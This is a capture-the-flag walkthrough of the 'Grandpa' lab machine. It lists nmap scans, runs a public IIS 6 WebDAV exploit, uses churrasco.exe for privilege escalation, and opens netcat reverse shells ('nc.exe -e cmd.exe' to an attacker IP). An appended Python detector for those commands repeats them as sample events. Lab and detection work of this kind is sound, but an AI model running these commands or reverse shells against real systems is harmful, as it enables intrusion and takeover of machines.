Ping

ping 10.10.10.14

Nmap Default Scan

nmap 10.10.10.14 -oN dnmap

Nmap Script and Service Scan

nmap 10.10.10.14 -sC -sV -A -oN snmap

We can see the path now…!

All port Scan

nmap 10.10.10.14 -p- --open -T5 -oN anmap

On Port 80

Will search for a public exploit. Found one: https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Will run the exploit

python2 exp.py 10.10.10.14 80 10.10.14.2 443

Got Reverse shell

rlwrap nc -nvlp 443

Will jump to Privilege Escalation…!

Will get the system info. Got the vulnerable one..!

Get the binary from the link https://github.com/Re4son/Churrasco/raw/master/churrasco.exe and share it to the target machine via SMB.

impacket-smbserver kali .

copy \\10.10.14.2\kali\churrasco.exe

Now will run the binary. It worked..!

Will get the reverse shell using nc.exe. First, will transfer nc.exe to the target machine.

copy \\10.10.14.2\kali\nc.exe

Now will get the reverse shell

churrasco.exe "nc.exe -e cmd.exe 10.10.14.2 443"

rlwrap nc -nvlp 443

Got it…!

Will get the flags

dir /s /b "C:\Documents and Settings\*.txt"

Got the locations.

User.txt

Root.txt

Done with Grandpa…:)
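
Seen from the defending side, the steps above leave recognisable process-creation traces. The following is an added example, not part of the original writeup: a small detector run over constructed events built from the commands in this walkthrough. The event format (parent image | image | command line) and the rule names are assumptions.

```python
import re

# Constructed process-creation events (parent image | image | command line).
# The format is hypothetical; map the fields from whatever telemetry you collect.
SAMPLE_EVENTS = r"""
w3wp.exe|cmd.exe|cmd.exe
cmd.exe|cmd.exe|cmd.exe /c copy \\10.10.14.2\kali\nc.exe
cmd.exe|churrasco.exe|churrasco.exe "nc.exe -e cmd.exe 10.10.14.2 443"
churrasco.exe|nc.exe|nc.exe -e cmd.exe 10.10.14.2 443
services.exe|svchost.exe|svchost.exe -k netsvcs
cmd.exe|xcopy.exe|xcopy \\fileserver\deploy\site D:\site /E
""".strip().splitlines()

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
SHELLS = {"cmd.exe", "powershell.exe"}
RULES = {
    # A shell handed to a network tool: "-e cmd.exe" followed by host and port.
    "shell_over_socket": re.compile(
        r"\s-e\s+(?:cmd|powershell)(?:\.exe)?\s+" + IPV4 + r"\s+\d{1,5}\b", re.I),
    # File pulled from a share addressed by raw IP instead of a server name.
    "unc_by_ip": re.compile(r"\\\\" + IPV4 + r"\\", re.I),
}

def detect(line):
    """Return the sorted rule names that fire for one event line."""
    parent, image, cmdline = line.split("|", 2)
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    # The IIS worker process has no business starting an interactive shell.
    if parent.lower() == "w3wp.exe" and image.lower() in SHELLS:
        hits.add("iis_worker_spawned_shell")
    return sorted(hits)

def scan(lines):
    """Map each flagged line to its hits; benign lines are left out."""
    return {l: h for l in lines if (h := detect(l))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", line)
```

Because copy is a cmd built-in, unc_by_ip only fires when it is launched as cmd /c copy; SMB connection logs are the more reliable source for that step.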